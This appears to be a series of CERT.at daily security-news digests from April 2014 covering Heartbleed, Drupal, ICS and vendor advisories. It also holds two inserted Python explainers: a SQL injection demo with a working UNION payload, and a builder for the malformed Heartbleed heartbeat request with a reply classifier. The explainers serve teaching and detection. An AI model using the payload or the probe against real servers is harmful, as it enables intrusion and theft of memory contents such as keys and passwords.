Siemens ProductCERT and Ralf Spenneberg, Hendrik Schwartke, and Maik Brüggemann from OpenSource Training have reported two vulnerabilities in the Siemens SIMATIC S7-1200 CPU family. Siemens has produced a new product release that mitigates these vulnerabilities.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02
*** InduSoft Web Studio Directory Traversal Vulnerability ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on April 17, 2014, and is now being released to the NCCIC/ICS-CERT web site.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02
*** Festo CECX-X-(C1/M1) Controller Vulnerabilities ***
---------------------------------------------
K. Reid Wightman of IOActive, Inc. has identified vulnerabilities in Festo’s CECX-X-C1 and CECX-X-M1 controllers. Festo has decided not to resolve these vulnerabilities because of compatibility reasons with existing engineering tools. This places critical infrastructure asset owners using this product at risk. This advisory is being published to alert critical infrastructure asset owners of the risk of using this equipment and for them to increase compensating measures if possible.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-084-01
*** Oracle Solaris ntpd Query Function Lets Remote Users Conduct Amplified Denial of Service Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1030142
*** Synology DiskStation Manager cUrl Connection Re-use and Certificate Verification Security Issues ***
---------------------------------------------
https://secunia.com/advisories/58145
*** SSA-635659 (Last Update 2014-04-25): Heartbleed Vulnerability in Siemens Industrial Products ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** Halon Security Router Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57507
*** HP Security Bulletins ***
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 23-04-2014 18:00 − Thursday 24-04-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** NetSupport Information Leakage Using Nmap Script ***
---------------------------------------------
NetSupport allows corporations to remotely manage and connect to PCs and servers from a central location for the purposes of desktop support. In my last post I discussed how I wrote a script using the NetSupport scripting language to find versions of NetSupport running on clients with default installations that didn't require authentication to remotely connect to them. Essentially you could use NetSupport to bypass any Domain or local credentials to remotely connect to the PC and...
---------------------------------------------
http://blog.spiderlabs.com/2014/04/netsupport-information-leakage-using-nma…
*** DHCPv6 and DUID Confusion, (Wed, Apr 23rd) ***
---------------------------------------------
In IPv6, DHCP is taking somewhat of a back seat to router advertisements. Many smaller networks are unlikely to use DHCP. However, in particular for Enterprise/larger networks, DHCPv6 still offers a lot of advantages when it comes to managing hosts and accounting for IP addresses in use. One of the big differences when it comes to DHCPv6 is that a host identifies itself with a DUID (DHCP Unique Identifier), which can be different from a MAC address. There are essentially three ways to come up with...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=18015&rss
*** Cisco: Hey, IT depts. You're all malware hosts ***
---------------------------------------------
Security report also notes skills shortage. Everybody - at least every multinational that Cisco checked out for its 2014 Annual Security Report - is hosting malware of some kind, and there aren't enough security professionals to go around.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/04/24/cisco_youre…
*** DrDoS attacks to reach 800 Gbps in 2015 ***
---------------------------------------------
While the network time protocol (NTP) DrDoS threats that became prevalent in early 2014 have been contained, new distributed reflected denial of service threats will lead to attacks in excess of 800 Gbps during the next 12 to 18 months.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16733
*** Zero-day vulnerability in Apache Struts 2 ***
---------------------------------------------
Through a small variation of an already patched vulnerability, attackers can once again inject code into the server.
---------------------------------------------
http://www.heise.de/security/meldung/Zero-Day-Luecke-in-Apache-Struts-2-217…
*** Situational Awareness Alert for OpenSSL Vulnerability (Update D) ***
---------------------------------------------
This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-009-01C Situational Awareness Alert for OpenSSL Vulnerability that was published April 17, 2014, on the ICS-CERT web site.
---------------------------------------------
http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01D
*** Drupal - Vulnerabilities in Third-Party Modules ***
---------------------------------------------
https://drupal.org/node/2248073
https://drupal.org/node/2248077
https://drupal.org/node/2248145
https://drupal.org/node/2248171
*** Attachmate Reflection OpenSSL TLS Heartbeat Buffer Overread Lets Remote Users Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1030144
*** Bugtraq: Weak firmware encryption and predictable WPA key on Sitecom routers ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531920
*** SSA-892012 (Last Update 2014-04-24): Web Vulnerabilities in SIMATIC S7-1200 CPU ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** Vuln: Check_MK Multiple Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/bid/66389
http://www.securityfocus.com/bid/66391
http://www.securityfocus.com/bid/66394
http://www.securityfocus.com/bid/66396
*** Notice: (Revision) CUSTOMER ATTENTION REQUIRED: HP Integrated Lights-Out and Integrated Lights-Out 2 - Scanning First-Generation iLO or iLO 2 Devices for the Heartbleed Vulnerability Results in iLO Lockup Requiring Power to be PHYSICALLY Removed ***
---------------------------------------------
The first-generation iLO and iLO 2 products use the RSA SSL libraries, and there is a bug in these libraries that will cause first-generation iLO and iLO 2 devices to enter a live lockup situation when a vulnerability scanner runs to check for the Heartbleed vulnerability. Although the server's operating system will continue to function normally, first-generation iLO and iLO 2 will no longer be responsive over the management network.
---------------------------------------------
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** HPSBHF03006 rev.1 - HP Integrated Lights-Out 2 (iLO 2) Denial of Service ***
---------------------------------------------
A potential security vulnerability has been identified in HP Integrated Lights-Out 2 (iLO 2) servers that allows for a Denial of Service. The denial of service condition occurs only when the iLO 2 is scanned by vulnerability assessment tools that test for CVE-2014-0160 (Heartbleed vulnerability).
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HP Security Bulletins for CVE 2014-0160 ***
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Vuln: EMC Connectrix Manager Converged Network Edition Remote Information Disclosure Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/66308
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 22-04-2014 18:00 − Wednesday 23-04-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Maintenance work on the mailing list server, 24 April 2014 ***
---------------------------------------------
On the afternoon of 24 April we will carry out maintenance work on our mailing list server (lists.cert.at). Effects: delayed delivery of list mails; the administration interface (subscribe/unsubscribe etc.) of the mailing lists will be unavailable; mailing list archives will be unavailable. We will do our best to keep the outages as short as possible, but cannot give an exact...
---------------------------------------------
http://www.cert.at/services/blog/20140423085410-1134.html
*** DBIR: Poor Patching, Weak Credentials Open Door to Data Breaches ***
---------------------------------------------
Weak or default credentials, poor configurations and a lack of patching are common denominators in most data breaches, according to the 2014 Verizon Data Breach Investigations Report.
---------------------------------------------
http://threatpost.com/dbir-poor-patching-weak-credentials-open-door-to-data…
*** Millions of Feedly users vulnerable to JavaScript injection attack ***
---------------------------------------------
A security researcher discovered a serious JavaScript injection vulnerability in the popular Feedly Android app, impacting millions of users.
---------------------------------------------
http://securityaffairs.co/wordpress/24209/hacking/feedly-javascript-vulnera…
*** Apple patches security holes in iOS, OS X and WLAN base stations ***
---------------------------------------------
The updates are meant to eliminate critical vulnerabilities in Apple's operating systems - among them another hole that allows eavesdropping on SSL connections. A Heartbleed fix is available for the AirPort stations.
---------------------------------------------
http://www.heise.de/security/meldung/Apple-stopft-Sicherheitsluecken-in-iOS…
*** Operation Francophoned: The Persistence and Evolution of a Dual-Pronged Social Engineering Attack ***
---------------------------------------------
Operation Francophoned, first uncovered by Symantec in May 2013, involved organizations receiving direct phone calls and spear phishing emails impersonating a known telecommunication provider in France, all in an effort to install malware and steal information and ultimately money from targets.
---------------------------------------------
http://www.symantec.com/connect/blogs/operation-francophoned-persistence-an…
*** Blog: An SMS Trojan with global ambitions ***
---------------------------------------------
Recently, we've seen SMS Trojans starting to appear in more and more countries. One prominent example is Trojan-SMS.AndroidOS.Stealer.a: this Trojan came top in Kaspersky Lab's recent mobile malware TOP 20. It can currently send short messages to premium-rate numbers in 14 countries around the world.
---------------------------------------------
http://www.securelist.com/en/blog/8209/An_SMS_Trojan_with_global_ambitions
*** ISC discontinues development of its BIND10 DNS server ***
---------------------------------------------
The company has released the last version it will develop and is withdrawing from further development. BIND10 was originally meant to replace BIND9, which at the time could only make inadequate use of high-performance servers.
---------------------------------------------
http://www.heise.de/newsticker/meldung/ISC-stellt-Entwicklung-an-seinem-BIN…
*** Nine patterns make up 92 percent of security incidents ***
---------------------------------------------
Verizon security researchers have found that 92 percent of the 100,000 security incidents analyzed over the past ten years can be traced to nine basic attack patterns that vary from industry to industry.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16725
*** Dissecting the unpredictable DDoS landscape ***
---------------------------------------------
DDoS attacks are now more unpredictable and damaging than ever, crippling websites, shutting down operations, and costing millions of dollars in downtime, customer support and brand damage, according to Neustar.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16726
*** Special Edition of OUCH: Heartbleed - Why Do I Care? http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-2014-special_e…, (Wed, Apr 23rd) ***
---------------------------------------------
-- Alex Stanford - GIAC GWEB, Research Operations Manager, SANS Internet Storm Center (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=18013&rss
*** Apple splats new SSL snooping bug in iOS, OS X - but it's no Heartbleed ***
---------------------------------------------
Triple-handshake flaw stalks Macs and iThings. Apple has squashed a significant security bug in its SSL engine for iOS and OS X as part of a slew of patches for iThings and Macs.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/04/23/apple_ssl_u…
*** Joomla Plugin Constructor Backdoor ***
---------------------------------------------
We recently wrote about backdoors in pirated commercial WordPress plugins. This time it will be a short post about an interesting backdoor we found in a Joomla plugin. It was so well organized that at first we didn't realize there was a backdoor even though we knew something was wrong. That's how the code of...
---------------------------------------------
http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
*** Citrix Security Advisory for CVE-2014-0160, aka the Heartbleed vulnerability ***
---------------------------------------------
A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSS...
---------------------------------------------
http://support.citrix.com/article/CTX140605
*** IBM PSIRT - OpenSSL Heartbleed (CVE-2014-0160) ***
---------------------------------------------
We will continue to update this blog to include information about products. The following is a list of products affected by the Heartbleed vulnerability. Please follow the links below to view the security bulletins for the affected products.
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/openssl_heartbleed_cv…
*** Information on Norton products and the Heartbleed vulnerability ***
---------------------------------------------
This article answers many of the questions that are currently being asked about the Heartbleed bug and the role that Norton products play in defending against this attack.
---------------------------------------------
https://support.norton.com/sp/en/us/home/current/solutions/v98431836_EndUse…
*** OpenSSL Security Vulnerability - aka. "Heartbleed Bug" - CVE-2014-0160 - Security Incident Response for D-Link Devices and Services ***
---------------------------------------------
D-Link is investigating all devices and systems that utilize the OpenSSL software library to determine if our devices and customers are affected by this security vulnerability. You will find current status below and can contact us at security(a)dlink.com about specific questions.
---------------------------------------------
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10022
*** Heartbleed Vulnerability in Various Products ***
---------------------------------------------
http://tomcat.apache.org/native-doc/news/2014.html
http://tomcat.apache.org/native-doc/miscellaneous/changelog.html
http://www.fortiguard.com/advisory/FG-IR-14-011/
http://www.sybase.com/detail?id=1099387
https://secunia.com/advisories/58188 (Symantec Multiple Products)
https://secunia.com/advisories/58148 (Xerox WorkCentre 3315/3325)
*** VU#350089: IBM Notes and Domino on x86 Linux specify an executable stack ***
---------------------------------------------
Vulnerability Note VU#350089 - IBM Notes and Domino on x86 Linux specify an executable stack
Original Release date: 22 Apr 2014 | Last revised: 22 Apr 2014
Overview: IBM Notes and Domino on x86 Linux are incorrectly built requesting an executable stack. This can make it easier for attackers to exploit vulnerabilities in Notes, Domino, and any of the child processes that they may spawn.
Description: The build environment for the x86 Linux versions of IBM Notes and Domino incorrectly specified the...
---------------------------------------------
http://www.kb.cert.org/vuls/id/350089
*** Cisco ASA SIP Inspection Memory Leak Vulnerability ***
---------------------------------------------
A vulnerability in the Session Initiation Protocol (SIP) inspection engine code could allow an unauthenticated, remote attacker to cause a slow memory leak, which may cause instability on the affected system.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** AirPort Extreme and AirPort Time Capsule OpenSSL TLS Heartbeat Buffer Overread Lets Remote Users Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1030132
*** Apple OS X Multiple Bugs Let Remote Users Execute Arbitrary Code and Deny Service and Local Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1030133
*** Sixnet Sixview 2.4.1 Directory Traversal ***
---------------------------------------------
Topic: Sixnet Sixview 2.4.1 Directory Traversal Risk: Medium Text:#Exploit Title: Sixnet sixview web console directory traversal #Date: 2014-04-21 #Exploit Author: daniel svartman #Vendor Ho...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040150
*** Parallels Plesk Panel 12.x Key Disclosure ***
---------------------------------------------
Topic: Parallels Plesk Panel 12.x Key Disclosure Risk: High Text:While auditing the source code for Parallels Plesk Panel 12.x on Linux I noticed the following feature that leads to leakage o...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040151
*** [2014-04-23] Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances ***
---------------------------------------------
An unauthenticated remote attacker can exploit the identified Path Traversal vulnerability in order to retrieve arbitrary files from the affected WD Arkeia Network Backup appliances and execute system commands.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Security Advisory-Improper Input Validation Vulnerability on Multiple Quidway Switch Products ***
---------------------------------------------
Once exploited, the vulnerability might cause excessive resource (e.g. memory) consumption on the vulnerable system and even cause the system to restart in serious cases.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** HP Security Bulletins ***
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Security Advisories Relating to Symantec Products - Symantec Messaging Gateway Management Console Reflected XSS ***
---------------------------------------------
Symantec's Messaging Gateway management console is susceptible to a reflected cross-site scripting (XSS) issue found in one of the administrative interface pages. Successful exploitation could result in potential session hijacking or unauthorized actions directed against the console with the privileges of the targeted user's browser.
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Security Bulletin: IBM Sterling Order Management is affected by Cross Site Scripting (XSS) Vulnerability (CVE-2014-0932) ***
---------------------------------------------
IBM Sterling Order Management is vulnerable to a cross-site scripting attack which could lead to unauthorized access through the injected scripts.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21670912
*** Django Security Issue and Multiple Vulnerabilities ***
---------------------------------------------
A security issue and multiple vulnerabilities have been reported in Django, which can be exploited by malicious people to potentially disclose certain sensitive information, manipulate certain data, and compromise a vulnerable system.
---------------------------------------------
https://secunia.com/advisories/58201
*** Hitachi Multiple Cosminexus / uCosminexus Products Java Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/58197
*** Hitachi Multiple Cosminexus / uCosminexus Products SSL/TLS Initialization Vector Selection Weakness ***
---------------------------------------------
https://secunia.com/advisories/58240
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 17-04-2014 18:00 − Friday 18-04-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Looking for malicious traffic in electrical SCADA networks - part 2 - solving problems with DNP3 Secure Authentication Version 5, (Thu, Apr 17th) ***
---------------------------------------------
I received this week a very valuable e-mail from the DNP Technical Committee Chair, Mr. Andrew West, who pointed out an excellent observation: the very slow adoption of DNP3 Secure Authentication Version 5, which is the latest security enhancement for the DNP3 protocol. I want to talk today about this standard and the advantages of adopting it into your DNP3 SCADA system. This standard has two specific objectives: Help DNP3 outstations to determine beyond any reasonable doubt that its...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17981&rss
*** Heartbleed Bug Sends Bandwidth Costs Skyrocketing ***
---------------------------------------------
The exposure of the Heartbleed vulnerability last week had a number of repercussions, one of which was to set off a mad scramble by companies to revoke the SSL certificates for their domains and services and obtain new ones. The total costs of Heartbleed are yet to be calculated, but CloudFlare has come up with...
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/397cb2f7/sc/5/l/0L0Swired0N0C20A1…
*** Heartbleed causes problems for the Tor anonymisation network ***
---------------------------------------------
Around a fifth of the exit nodes are affected by the OpenSSL hole - proposal to throw them out of the network...
---------------------------------------------
http://derstandard.at/1397520979826
*** Mac OS X Trojans display ads ***
---------------------------------------------
April 16, 2014. Malicious programs designed to generate a profit for intruders by displaying annoying ads are very common, but until recently they have mostly been a nuisance for Windows users. That's why a few Trojans that were recently examined by Doctor Web's security researchers stand out among such applications...
---------------------------------------------
http://news.drweb.com/show/?i=4352&lng=en&c=9
*** Heartbleed Update ***
---------------------------------------------
Adobe has evaluated the Creative Cloud and its related services (including Behance and Digital Publishing Suite), the Marketing Cloud solutions and products (including Analytics, Analytics Premium and Experience Manager), EchoSign, Acrobat.com, the Adobe.com store, and other Adobe services. All Adobe internet-facing services known to have been using a version of OpenSSL containing the Heartbleed vulnerability have been mitigated. We are continuing our analysis of Adobe internet-facing servers to identify and remediate any remaining Heartbleed-related risks.
---------------------------------------------
http://blogs.adobe.com/psirt/?p=1085
*** Security Advisory-OpenSSL Heartbeat Extension vulnerability (Heartbleed bug) on Huawei multiple products ***
---------------------------------------------
Some OpenSSL software versions used in multiple Huawei products have the following OpenSSL vulnerability. Unauthorized remote attackers can dump 64 Kbytes of memory of the connected server or client in each attack. The leaked memory may contain sensitive information, such as passwords and private keys (Vulnerability ID: HWPSIRT-2014-0414).
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** McAfee Security Bulletin - OpenSSL Heartbleed vulnerability patched in McAfee products ***
---------------------------------------------
Several McAfee products are vulnerable to OpenSSL Heartbleed. See the McAfee Product Vulnerability Status lists below for the status of each product.
---------------------------------------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10071
*** Nagios Remote Plugin Executor 2.15 Remote Command Execution ***
---------------------------------------------
Topic: Nagios Remote Plugin Executor 2.15 Remote Command Execution
Risk: High
Text: - Release date: 17.04.2014 - Discovered by: Dawid Golunski - Severity: High I. VULNER...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040126
*** MariaDB Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/58106
*** Debian update for qemu and qemu-kvm ***
---------------------------------------------
https://secunia.com/advisories/58088
*** OpenVZ update for kernel ***
---------------------------------------------
https://secunia.com/advisories/58060
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 16-04-2014 18:00 − Thursday 17-04-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Developer mode endangers BlackBerries ***
---------------------------------------------
With developer mode enabled, attackers can execute malicious code with full root privileges over WLAN or the USB connection. Even after the mode is switched off again, the device remains attackable until the next reboot.
---------------------------------------------
http://www.heise.de/security/meldung/Entwickler-Modus-gefaehrdet-Blackberri…
*** Heartbleed: BSI sees no reason to sound the all-clear ***
---------------------------------------------
The German Federal Office for Information Security (BSI) sees further need for action regarding the "Heartbleed bug". Smaller websites are still vulnerable, and attackers are now targeting other services as well.
---------------------------------------------
http://www.heise.de/security/meldung/Heartbleed-BSI-sieht-keinen-Grund-fuer…
*** Bugtraq: [SECURITY] [DSA 2907-1] Announcement of long term support for Debian oldstable ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531856
*** mAdserve id SQL injection ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/92545
*** SA-CONTRIB-2014-041 - Block Search - SQL Injection ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-041
Project: Block Search (third-party module)
Version: 6.x
Date: 2014-April-16
Security risk: Highly critical
Exploitable from: Remote
Vulnerability: SQL Injection
Description: The Block Search module provides an alternative way of managing blocks. The module doesn't properly use Drupal's database API, resulting in user-provided strings being passed directly to the database and allowing SQL injection. This vulnerability is mitigated by the fact that an attacker must either use a
---------------------------------------------
https://drupal.org/node/2242463
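The advisory's root cause, user-provided strings passed straight into SQL text instead of through the database API's placeholders, is the same mistake in any language. The following is an added Python/sqlite3 illustration, not code from the Block Search module or from Drupal; the tables, rows and the injection string are constructed for the example. The vulnerable function splices the search string into the query; the safe one hands it to the engine as a bound parameter, which is what Drupal's database API does with its own placeholder syntax.

```python
import sqlite3


def setup_db():
    """Constructed in-memory stand-in for a site database: a block table the
    module would query and a users table the attacker wants to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE block (bid INTEGER PRIMARY KEY, title TEXT, region TEXT);
        CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO block VALUES (1, 'Navigation', 'sidebar'), (2, 'Search', 'header');
        INSERT INTO users VALUES (1, 'admin', '$S$constructed-hash');
    """)
    return conn


def find_blocks_vulnerable(conn, title):
    """The anti-pattern the advisory describes: the user-supplied string is
    spliced into the SQL text, so a quote character changes the statement."""
    sql = "SELECT bid, title FROM block WHERE title = '%s'" % title
    return conn.execute(sql).fetchall()


def find_blocks_safe(conn, title):
    """Placeholder query: the value travels to the engine separately from the
    SQL text and is never parsed as SQL, whatever characters it contains."""
    return conn.execute(
        "SELECT bid, title FROM block WHERE title = ?", (title,)
    ).fetchall()


# Constructed attack string: closes the quoted literal, appends a UNION that
# reads from another table, and comments out the trailing quote.
INJECTION = "' UNION SELECT uid, pass FROM users --"

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", find_blocks_vulnerable(db, INJECTION))  # leaks the password hash row
    print("safe:      ", find_blocks_safe(db, INJECTION))        # no block has that title: []
```

Run as a script it prints the leaked `users` row for the vulnerable path and an empty list for the parameterised one; the legitimate search ("Search") returns the same block row through both.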
*** SA-CORE-2014-002 - Drupal core - Information Disclosure ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CORE-2014-002
Project: Drupal core
Version: 6.x, 7.x
Date: 2014-April-16
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Information Disclosure
Description: Drupal's form API has built-in support for temporary storage of form state, for example user input. This is often used on multi-step forms, and is required on Ajax-enabled forms in order to allow the Ajax calls to access and update interim user input on the server. When pages are cached for anonymous
---------------------------------------------
https://drupal.org/SA-CORE-2014-002
*** Heartbleed CRL Activity Spike Found, (Wed, Apr 16th) ***
---------------------------------------------
It looks like, as I had suspected, the CRL activity numbers we have been seeing did not reflect the real volume caused by the OpenSSL Heartbleed bug. This evening I noticed a massive spike in the amount of revocations being reported by this CRL: http://crl.globalsign.com/gs/gsorganizationvalg2.crl The spike is so large that we initially thought it was a mistake, but we have since confirmed that it's real! We're talking about over 50,000 unique revocations from a single CRL. This is by an order
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17977&rss
*** Confirmed: Nasty Heartbleed bug exposes OpenVPN private keys, too ***
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/cz_Y-Ayd5tw/
*** OpenSSL bug Heartbleed: according to vendor statements, most routers are not vulnerable ***
---------------------------------------------
Most router vendors state that they use older OpenSSL versions. Several, however, provide no evidence that their devices are not vulnerable. Security-conscious users therefore have to roll up their sleeves and test the devices themselves.
---------------------------------------------
http://www.heise.de/security/meldung/OpenSSL-Bug-Heartbleed-Die-meisten-Rou…
*** SAP Router Password Timing Attack ***
---------------------------------------------
Topic: SAP Router Password Timing Attack
Risk: High
Text: Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Router Password Timing Attack 1. *Advisory Inf...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040118
*** Whats worse than Heartbleed? Bugs in Heartbleed detection scripts. ***
---------------------------------------------
As of the writing of this blog post, Nessus, Metasploit, Nmap, and others have released methods for detecting whether your systems are affected. The problem is, most of them have bugs themselves which lead to false negative results, that is, a result which says a system is not vulnerable when in reality it is. With many people likely running detection scripts or other scans against hosts to check if they need to be patched, it is important that these bugs be addressed before too many people
---------------------------------------------
http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbl…
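A false negative in a Heartbleed check almost always comes from how the reply is interpreted rather than from how the probe is built. The following Python sketch is an added example, not code from the hut3 post nor from Nessus, Metasploit or Nmap: it builds the malformed heartbeat record (declared payload length far larger than the payload sent, the same trick the Huawei advisory above describes as dumping up to 64 KB per request) and classifies a captured reply. The verdict logic is the point: a timeout, a read that stopped mid-record, or an empty reply is reported as inconclusive rather than "not vulnerable", and heartbeat data is summed across TLS records because a 64 KB echo arrives fragmented into 16 KB records. The reply byte strings are constructed; nothing is sent on the wire.

```python
import struct

# TLS record content types (RFC 5246 / RFC 6520)
CT_ALERT = 0x15
CT_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16        # minimum padding a heartbeat message carries (RFC 6520)
MAX_FRAGMENT = 16384   # a single TLS record body never exceeds this


def tls_record(ctype, body, version=(3, 1)):
    """Wrap body in a TLS record header: content type, version, 16-bit length."""
    return struct.pack("!BBBH", ctype, version[0], version[1], len(body)) + body


def heartbeat_probe(version=(3, 1), claimed_len=0x4000, payload=b"\x01"):
    """Heartbeat request whose declared payload_length (claimed_len) is far larger
    than the payload actually sent. A fixed OpenSSL discards it; a vulnerable one
    echoes claimed_len bytes copied from its process memory. Probes for TLS 1.0,
    1.1 and 1.2 differ only in the version bytes, and a scanner should try each:
    a server may answer a version it is not configured for with an alert or silence."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload
    return tls_record(CT_HEARTBEAT, body, version)


def parse_records(data):
    """Split a byte stream into (content_type, body) records. Returns the complete
    records and any trailing incomplete bytes: a partial record means the read
    stopped early, not that the server sent nothing."""
    records, pos = [], 0
    while pos + 5 <= len(data):
        ctype, _vmaj, _vmin, length = struct.unpack("!BBBH", data[pos:pos + 5])
        if pos + 5 + length > len(data):
            break
        records.append((ctype, data[pos + 5:pos + 5 + length]))
        pos += 5 + length
    return records, data[pos:]


def classify(response, sent_payload_len=1, timed_out=False):
    """Verdict on a server's reaction to heartbeat_probe(): 'vulnerable',
    'not_vulnerable' or 'inconclusive'. Only a heartbeat response carrying more
    bytes than we sent is positive evidence. Silence, a timeout or a truncated
    read is not evidence of safety and must not be reported as such."""
    records, leftover = parse_records(response)
    echoed, hb_records = 0, 0
    for ctype, body in records:
        if ctype == CT_ALERT:
            # The server refused the heartbeat outright instead of answering it.
            return "not_vulnerable"
        if ctype != CT_HEARTBEAT:
            continue
        if hb_records == 0:
            if body[:1] != bytes([HB_RESPONSE]):
                continue
            echoed += len(body) - 3   # strip type byte and 16-bit length field
        else:
            echoed += len(body)       # continuation fragment of the same message
        hb_records += 1
    if echoed > sent_payload_len + HB_PADDING:
        return "vulnerable"
    if timed_out or leftover or not records:
        return "inconclusive"
    return "not_vulnerable"


def sample_responses():
    """Constructed replies for offline testing; no network traffic involved."""
    msg = bytes([HB_RESPONSE]) + struct.pack("!H", 0x4000) + b"K" * (0x4000 + HB_PADDING)
    leaked = (tls_record(CT_HEARTBEAT, msg[:MAX_FRAGMENT])
              + tls_record(CT_HEARTBEAT, msg[MAX_FRAGMENT:]))
    honest = tls_record(CT_HEARTBEAT, bytes([HB_RESPONSE, 0, 1]) + b"\x01" + b"P" * HB_PADDING)
    return {
        "leaked": leaked,            # 64 KB echo split over two TLS records
        "truncated": leaked[:1000],  # socket read gave up before the first record ended
        "alert": tls_record(CT_ALERT, b"\x02\x0a"),   # fatal, unexpected_message
        "honest": honest,            # echo of exactly what was sent plus padding
        "silence": b"",
    }


if __name__ == "__main__":
    for name, reply in sample_responses().items():
        print(name, "->", classify(reply, timed_out=(name == "silence")))
```

A naive check that reads one record and maps "nothing usable came back" to "not vulnerable" reports the truncated and silent cases as safe; this classifier reports them as inconclusive, which is what a scan operator needs to see in order to retry with a longer timeout or another TLS version.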
*** Definition update for Microsoft's virus scanner slows down Windows XP ***
---------------------------------------------
http://derstandard.at/1397520906230
*** Access to SMS messages and Tor traffic thanks to Heartbleed ***
---------------------------------------------
Hackers have succeeded in reading out messages sent by SMS gateways, including tokens for two-factor authentication. Tor exit nodes also disclose arbitrary memory contents.
---------------------------------------------
http://www.heise.de/security/meldung/Zugriff-auf-SMS-Nachrichten-und-Tor-Tr…
*** Bleichenbacher attack: TLS problems in Java ***
